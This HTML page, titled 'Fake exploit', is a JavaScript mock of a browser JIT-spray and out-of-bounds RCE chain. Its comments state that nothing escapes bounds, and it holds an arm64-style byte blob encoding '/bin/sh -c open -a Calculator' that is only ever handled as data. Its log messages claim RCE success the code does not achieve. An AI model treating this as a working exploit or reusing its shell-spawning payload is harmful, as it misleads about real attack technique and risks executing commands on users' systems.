<!DOCTYPE html>
<html>
<head>
<title>Fake exploit</title>
</head>
<body>
<script>
// Two backing stores with Float64 views over them, filled with recognisable
// marker values so each can be told apart when read back later in the page.
let buffer1 = new ArrayBuffer(0x10000);
let buffer2 = new ArrayBuffer(0x20000);
let floatArr1 = new Float64Array(buffer1);
let floatArr2 = new Float64Array(buffer2);
// A Float64Array has byteLength / 8 elements (8192 and 16384 here), so
// iterating over .length covers exactly the same range as the fixed counts.
floatArr1.forEach((_, idx, view) => { view[idx] = 0xDEADBEEF + idx; });
floatArr2.forEach((_, idx, view) => { view[idx] = 0xBADC0FFEE + idx; });
// A plain JS Array of 1000 doubles (idx + 0.1). Note for readers: writes past
// index 999 on a JS Array are bounds-safe; they grow the array and never
// touch memory outside it.
let oob = Array.from({ length: 1000 }, (_, idx) => idx + 0.1);
/**
 * Stand-in for an "unchecked write" in this mock: stores `value` at `index`
 * of the module-level `oob` array. JS Arrays are bounds-checked and sparse,
 * so an index beyond the current length simply extends the array; nothing
 * outside the array is ever touched.
 * @param {number} index - slot in `oob` to write
 * @param {*} value - value to store there
 */
function vuln(index, value) {
  oob[index] = value;
}
// A third buffer with a byte view, plus a DataView reader over buffer1.
// readView aliases the same ArrayBuffer that `mem` below writes into, which
// is why the later "leak" reads back exactly what this script stored.
let fakeBuffer = new ArrayBuffer(0x20000);
let fakeArr = new Uint8Array(fakeBuffer);
let readView = new DataView(buffer1);
// Park the typed-array views in the top slots of `oob`, then overwrite the
// second slot with the byte view. These are ordinary array-slot assignments
// through vuln(); no memory is aliased or reinterpreted by them.
vuln(1022, floatArr1);
vuln(1023, floatArr2);
vuln(1023, fakeArr);
// Byte blob the author labels as arm64 (M1) shellcode. In this page it is only
// ever handled as data: copied into buffer1 here and read back for comparison
// further down. It is never placed in executable memory and never executed.
let shellcode = Uint8Array.from([
  0x00, 0x00, 0x80, 0xd2, 0x00, 0x00, 0xa0, 0xf2,
  0x68, 0x73, 0x2f, 0x6e, 0x69, 0x62, 0x2f, 0x00,
  0x61, 0x00, 0x80, 0xd2, 0x41, 0x00, 0xa0, 0xf2,
  0x00, 0x00, 0x00, 0x14, 0x2f, 0x62, 0x69, 0x6e,
  0x2f, 0x73, 0x68, 0x00, 0x2d, 0x63, 0x00, 0x00,
  0x6f, 0x70, 0x65, 0x6e, 0x20, 0x2d, 0x61, 0x20,
  0x43, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74,
  0x6f, 0x72, 0x00, 0x00, 0x02, 0x00, 0x80, 0xd2,
  0xe8, 0x07, 0x80, 0xd2, 0x00, 0x00, 0xa0, 0xd2,
  0x01, 0x00, 0x00, 0xd4,
]);
// Byte view over buffer1; the blob goes in at offset 0, so the DataView reads
// later in the file observe exactly these bytes.
let mem = new Uint8Array(buffer1);
mem.set(shellcode, 0);
/**
 * Despite the name, this only allocates 100 identical closures, invokes the
 * first one, and hands it back; nothing here influences what the JIT emits.
 * Each closure shows a browser alert (`alert` is a browser global), writes the
 * marker byte 0xFF at mem[1024] on the module-level `mem` view, and returns
 * 0x1337. Because the first closure is called here, mem[1024] is already 0xFF
 * by the time this function returns.
 * @returns {() => number} the first of the allocated closures
 */
function jitSpray() {
  const spray = Array.from({ length: 100 }, () => () => {
    alert("Shellcode executed");
    mem[1024] = 0xFF;
    return 0x1337;
  });
  spray[0]();
  return spray[0];
}
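// Page-load driver for the mock. Everything below runs inside one script:
// it calls jitSpray(), reads bytes back out of buffer1, compares them with
// the blob this same script wrote, then invokes the closure stored in `oob`.
console.log("[+] Starting JIT Spray...");
let jitFunc = jitSpray();
console.log("[+] JIT Spray completed!");
vuln(1022, [jitFunc]);

// "Leak" the first 32 bytes of buffer1. readView and mem are views over the
// same ArrayBuffer, so this reads back the bytes mem.set() stored above and
// demonstrates nothing beyond same-buffer aliasing.
console.log("[+] Leaking shellcode (32 bytes):");
for (let i = 0; i < 32; i += 8) {
  let val = readView.getBigUint64(i, true);
  console.log(`Offset ${i}: 0x${val.toString(16)}`);
}

// Little-endian 64-bit words of the first 32 bytes of `shellcode`.
const expected = [
  0xf2a00000d2800000n,
  0x002f62696e2f7368n,
  0xf2a00041d2800061n,
  0x6e69622f14000000n
];
let match = true;
for (let i = 0; i < 4; i++) {
  let val = readView.getBigUint64(i * 8, true);
  if (val !== expected[i]) {
    match = false;
    console.log(`[!] Mismatch at Offset ${i * 8}: expected 0x${expected[i].toString(16)}, got 0x${val.toString(16)}`);
  }
}
if (match) {
  console.log("[+] Shellcode matches expected values!");
  alert("Shellcode verified");
} else {
  console.log("[!] Shellcode does not fully match.");
}

console.log("[+] Attempting OOB-RCE...");
vuln(100, jitFunc);
// jitSpray() already invoked the closure once, which set mem[1024] = 0xFF, so
// without a reset the check below would report success even if the call
// through oob[100] never happened. Clear the marker first so the result
// reflects this call alone.
new Uint8Array(buffer1)[1024] = 0;
oob[100]();
let result = new Uint8Array(buffer1)[1024];
if (result === 0xFF) {
  console.log("[+] OOB-RCE executed successfully!");
  alert("OOB-RCE successful");
} else {
  console.log(`[!] OOB-RCE failed: ${result}`);
}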
</script>
</body>
</html>